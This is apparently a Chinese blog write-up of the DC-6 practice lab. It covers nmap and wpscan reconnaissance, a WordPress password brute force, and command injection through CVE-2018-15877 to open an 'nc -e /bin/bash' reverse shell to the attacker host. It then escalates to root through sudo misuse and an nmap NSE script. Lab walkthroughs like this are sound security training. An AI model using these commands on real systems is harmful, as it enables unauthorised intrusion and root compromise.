dc-6靶机

1.使用nmap进行信息搜集,存活主机,端口
192.168.85.184是存活主机,发现开放22,80端口
2.访问192.168.85.184的80端口
发现被重定向了,修改hosts文件

vim /etc/hosts
添加一行
192.168.85.174 wordy

3.对网站进行信息搜集并进行相关利用
找到一段信息
在这里插入图片描述
在这里插入图片描述
主要是说插件安全的问题,估计利用wordpress插件的漏洞
访问http://192.168.85.184/wp-includes,发现目录遍历,找到一些插件,尝试搜索相关漏洞利用,失败的
在这里插入图片描述
cms通过观察是wordpress,要知道wordpress有哪些漏洞就要知道版本
在这里插入图片描述
使用dirb对目录进行扫描

dirb http://192.168.85.184/

发现后台目录/wp-admin
尝试弱口令,失败
尝试sql注入,万能密码失败
4.使用wpscan对网站进行扫描
知道wordpress有哪些漏洞就要知道版本
扫描出版本 5.1.1,没找到漏洞
做靶机时要看一下官网描述
官网描述
在这里插入图片描述
只有一个flag,在root目录里
官网线索
在这里插入图片描述
主要说使用这个命令会节省你的时间
5.使用wpscan进行爆破
扫描用户名并写入user.txt

wpscan --url http://192.168.85.184 -e u

在这里插入图片描述
5个用户名写入user.txt
admin
mark
graham
sarah
jens
密码字典

gunzip rockyou.txt.gz           #解压
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

爆破

wpscan --url http://192.168.85.184 -U user.txt -P pass.txt

用户名 mark
密码 helpdesk01
在这里插入图片描述
6.登录后台,寻找可以利用点
登录成功
在一些wordpress版本中,是可以上传插件和主题的,可以在这个地方直接上传一句话木马,注意上传插件时可能会失败,但是当你查看文件时时上传成功的,因为上传插件时是先上传在解压安装的,之后可以在msf的php或linux马继续上线,进行下一步操作
没有发现上传的位置
在这里插入图片描述

发现一个插件,搜索相关漏洞
找到CVE-2018-15877,是命令执行漏洞

7.利用cve-2018-15877
在 Activity Monito的tools处有命令执行
在这里插入图片描述
在3处输入命令,在4处点击执行,3处有长度限制,f12修改最大长度
有两个思路
写一句话木马
反弹shell
写一句话木马失败,可能是权限问题
3处反弹shell

127.0.0.1|nc -e /bin/bash 192.168.85.129 4455

kali nc监听

nc -lvnp 4455
python进入交互式会话
python -c ’import pty;pty.spawn("/bin/bash")'

成功反弹
在这里插入图片描述
8.对主机进行信息搜集,进行提权
查看内核版本,版本是4.0的版本,太高没有找到漏洞

uname -a

当前权限www-data
把有权限的地方都看一看
进入家目录
进入到jens的家目录,发现一个备份backups.sh,查看内容,是打包web根目录下的文件
在这里插入图片描述
这个地方想到了linux提权中的打包提权,查看权限是jens权限,不是root权限
查找suid权限,发现sudo

sudo -l #查看当前用户的一些sudo权限

继续搜集
进入mark家目录,发现graham密码
在这里插入图片描述
username:graham
passwd:GSo7isUM1D4
9.使用graham用户登录ssh或su 切换用户
ssh 192.168.85.184 -l graham
GSo7isUM1D4
在这里插入图片描述
执行下面命令发现可以jens执行backups.sh

sudo -l

在这里插入图片描述
可以不需要jens密码以jens权限执行backups.sh

当写入赋予find的s权限,在作为打包命令执行的参数执行前面的命令执行时,是不能执行的,因为sudo文件的一些命令被禁止了以root权限执行
在这里插入图片描述
有一个思路看一下其他用户登录时sudo -l可以执行什么,但是使用前面搜集的两个密码登录都失败了
还有一个思路可以写入/bin/bash,sudo可以切换到jens用户

echo '/bin/bash'>>/home/jens/backups.sh
#sudo -u以指定用户执行
sudo -u jens ./home/jens/backups.sh

成功切换到jens用户
在这里插入图片描述
10.nmap提权
执行以下命令,发现可以不需要密码以root执行nmap命令

sudo -l

在这里插入图片描述
写一个bash,以root权限执行

echo 'os.execute('/bin/bash')' >1.nse
sudo nmap --script=1.nse
id

在这里插入图片描述
参考文章:
dc-6

posted @ 2023-04-29 19:19  mushangqiujin  阅读(0)  评论(0编辑  收藏  举报  来源